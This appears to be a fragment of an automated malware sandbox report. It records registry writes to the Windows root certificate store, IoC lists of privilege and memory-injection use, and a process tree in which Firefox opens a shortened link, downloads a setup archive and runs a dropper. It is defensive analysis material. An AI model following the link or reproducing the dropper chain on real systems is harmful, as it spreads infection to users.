3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e QlRCnaG.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 QlRCnaG.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e QlRCnaG.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e QlRCnaG.exe -
NTFS ADS 1 IoCs
description ioc Process File created C:\Users\Admin\Downloads\setup_GE5UjxGqn5.zip:Zone.Identifier firefox.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5968 setup_GE5UjxGqn5.tmp 5968 setup_GE5UjxGqn5.tmp 4472 illinkdetector.exe 4472 illinkdetector.exe 5264 msedge.exe 5264 msedge.exe 5228 msedge.exe 5228 msedge.exe 3952 identity_helper.exe 3952 identity_helper.exe 4472 illinkdetector.exe 4472 illinkdetector.exe 4472 illinkdetector.exe 4472 illinkdetector.exe 3792 powershell.exe 3792 powershell.exe 4172 powershell.exe 4172 powershell.exe 3116 powershell.exe 3116 powershell.exe 4508 powershell.exe 4508 powershell.exe 3116 powershell.exe 4172 powershell.exe 4508 powershell.exe 3792 powershell.exe 4168 ELeogOLxsWe.exe 4168 ELeogOLxsWe.exe 4168 ELeogOLxsWe.exe 4168 ELeogOLxsWe.exe 4168 ELeogOLxsWe.exe 4472 illinkdetector.exe 4472 illinkdetector.exe 4888 powershell.EXE 4888 powershell.EXE 4888 powershell.EXE 4472 illinkdetector.exe 4472 illinkdetector.exe 4164 msedge.exe 4164 msedge.exe 4164 msedge.exe 4164 msedge.exe 5556 msedge.exe 5556 msedge.exe 2868 powershell.exe 2868 powershell.exe 2868 powershell.exe 2092 powershell.exe 2092 powershell.exe 2092 powershell.exe 4428 powershell.EXE 4428 powershell.EXE 4472 illinkdetector.exe 4472 illinkdetector.exe 4428 powershell.EXE 5752 lMmcdHQ.exe 5752 lMmcdHQ.exe 5752 lMmcdHQ.exe 5752 lMmcdHQ.exe 5752 lMmcdHQ.exe 5752 lMmcdHQ.exe 5752 lMmcdHQ.exe 5752 lMmcdHQ.exe 5752 lMmcdHQ.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 19 IoCs
pid Process 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 764 firefox.exe Token: SeDebugPrivilege 764 firefox.exe Token: SeDebugPrivilege 764 firefox.exe Token: SeDebugPrivilege 764 firefox.exe Token: SeDebugPrivilege 3116 powershell.exe Token: SeDebugPrivilege 4172 powershell.exe Token: SeDebugPrivilege 3792 powershell.exe Token: SeDebugPrivilege 4508 powershell.exe Token: SeDebugPrivilege 4888 powershell.EXE Token: SeDebugPrivilege 2868 powershell.exe Token: SeDebugPrivilege 2092 powershell.exe Token: SeDebugPrivilege 4428 powershell.EXE -
Suspicious use of FindShellTrayWindow 51 IoCs
pid Process 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 5968 setup_GE5UjxGqn5.tmp 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe -
Suspicious use of SendNotifyMessage 29 IoCs
pid Process 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe 5228 msedge.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 540 wrote to memory of 764 540 firefox.exe 88 PID 540 wrote to memory of 764 540 firefox.exe 88 PID 540 wrote to memory of 764 540 firefox.exe 88 PID 540 wrote to memory of 764 540 firefox.exe 88 PID 540 wrote to memory of 764 540 firefox.exe 88 PID 540 wrote to memory of 764 540 firefox.exe 88 PID 540 wrote to memory of 764 540 firefox.exe 88 PID 540 wrote to memory of 764 540 firefox.exe 88 PID 540 wrote to memory of 764 540 firefox.exe 88 PID 540 wrote to memory of 764 540 firefox.exe 88 PID 540 wrote to memory of 764 540 firefox.exe 88 PID 764 wrote to memory of 4288 764 firefox.exe 89 PID 764 wrote to memory of 4288 764 firefox.exe 89 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 1812 764 firefox.exe 90 PID 764 wrote to memory of 2412 764 firefox.exe 91 PID 764 wrote to memory of 2412 764 firefox.exe 91 PID 764 wrote to memory of 2412 764 firefox.exe 91 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://ify.ac/17R3"1⤵
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://ify.ac/17R32⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="764.0.1206258477\639557843" -parentBuildID 20221007134813 -prefsHandle 1916 -prefMapHandle 1912 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {55c01d7e-418e-413c-8084-2f7e022ffd68} 764 "\\.\pipe\gecko-crash-server-pipe.764" 1996 1f6e9d05358 gpu3⤵PID:4288
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="764.1.602704086\560526480" -parentBuildID 20221007134813 -prefsHandle 2396 -prefMapHandle 2392 -prefsLen 21565 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2998aad0-bc08-440a-8a67-ded4dc7bbc2d} 764 "\\.\pipe\gecko-crash-server-pipe.764" 2432 1f6e88e3558 socket3⤵
- Checks processor information in registry
PID:1812
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="764.2.183738092\2090053344" -childID 1 -isForBrowser -prefsHandle 3268 -prefMapHandle 3296 -prefsLen 21603 -prefMapSize 233444 -jsInitHandle 1080 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed5831a3-e03b-487a-b924-d1e0e7f5ea59} 764 "\\.\pipe\gecko-crash-server-pipe.764" 3260 1f6e8d5d958 tab3⤵PID:2412
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="764.3.565868687\213550493" -childID 2 -isForBrowser -prefsHandle 3620 -prefMapHandle 3616 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1080 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2da553ac-671b-4203-959b-3a022dd3d3e1} 764 "\\.\pipe\gecko-crash-server-pipe.764" 3628 1f6edb7d858 tab3⤵PID:4864
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="764.4.460447939\846965247" -childID 3 -isForBrowser -prefsHandle 4732 -prefMapHandle 4740 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1080 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {21ee1ddd-6b5e-43e1-93a3-d0490b25fe4c} 764 "\\.\pipe\gecko-crash-server-pipe.764" 4924 1f6eebe9558 tab3⤵PID:540
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="764.5.1969552868\637838043" -childID 4 -isForBrowser -prefsHandle 5056 -prefMapHandle 5060 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1080 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a14f15b-9f5d-4d9b-ad13-d7f2ad8baa5d} 764 "\\.\pipe\gecko-crash-server-pipe.764" 5048 1f6eebe9e58 tab3⤵PID:3220
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="764.6.2082097293\129022314" -childID 5 -isForBrowser -prefsHandle 5228 -prefMapHandle 5232 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1080 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4b2c902-5e40-49f2-96c6-021c672135d3} 764 "\\.\pipe\gecko-crash-server-pipe.764" 5216 1f6eebebf58 tab3⤵PID:2480
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="764.7.977482216\178284956" -childID 6 -isForBrowser -prefsHandle 5876 -prefMapHandle 5872 -prefsLen 26381 -prefMapSize 233444 -jsInitHandle 1080 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0debc9ff-c573-421e-824d-1663d9280525} 764 "\\.\pipe\gecko-crash-server-pipe.764" 5896 1f6f0b0a258 tab3⤵PID:804
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="764.8.218006310\1302342207" -childID 7 -isForBrowser -prefsHandle 3304 -prefMapHandle 4732 -prefsLen 26381 -prefMapSize 233444 -jsInitHandle 1080 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a0a1bafb-120b-4f0e-b234-61fc91647800} 764 "\\.\pipe\gecko-crash-server-pipe.764" 2892 1f6f0b0a858 tab3⤵PID:1688
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="764.9.1727110710\1673649857" -childID 8 -isForBrowser -prefsHandle 5080 -prefMapHandle 6060 -prefsLen 26646 -prefMapSize 233444 -jsInitHandle 1080 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f1f851fe-cc6b-4549-a8b9-623cf94000a1} 764 "\\.\pipe\gecko-crash-server-pipe.764" 3136 1f6ee2cab58 tab3⤵PID:5988
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5320
-
C:\Users\Admin\AppData\Local\Temp\Temp1_setup_GE5UjxGqn5.zip\setup_GE5UjxGqn5.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_setup_GE5UjxGqn5.zip\setup_GE5UjxGqn5.exe"1⤵PID:2080
-
C:\Users\Admin\AppData\Local\Temp\is-B6FQE.tmp\setup_GE5UjxGqn5.tmp"C:\Users\Admin\AppData\Local\Temp\is-B6FQE.tmp\setup_GE5UjxGqn5.tmp" /SL5="$E0054,4281472,56832,C:\Users\Admin\AppData\Local\Temp\Temp1_setup_GE5UjxGqn5.zip\setup_GE5UjxGqn5.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:5968 -
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s "C:\Windows\system32\atl.dll"3⤵PID:3576
-
-
C:\Users\Admin\AppData\Local\Internal Link Detector\illinkdetector.exe"C:\Users\Admin\AppData\Local\Internal Link Detector\illinkdetector.exe" 4d7967305b653a2d056922aec2a401fc3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4472 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 9404⤵
- Program crash
PID:2192
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 9644⤵
- Program crash
PID:3200
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 10404⤵
- Program crash
PID:5712
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 11604⤵
- Program crash
PID:732
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 12204⤵
- Program crash
PID:2276
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 13004⤵
- Program crash
PID:3052
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 13084⤵
- Program crash
PID:5336
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 13284⤵
- Program crash
PID:2512
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 13364⤵
- Program crash
PID:3268
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 13284⤵
- Program crash
PID:3156
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 10524⤵
- Program crash
PID:2644
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 13364⤵
- Program crash
PID:5596
-
-
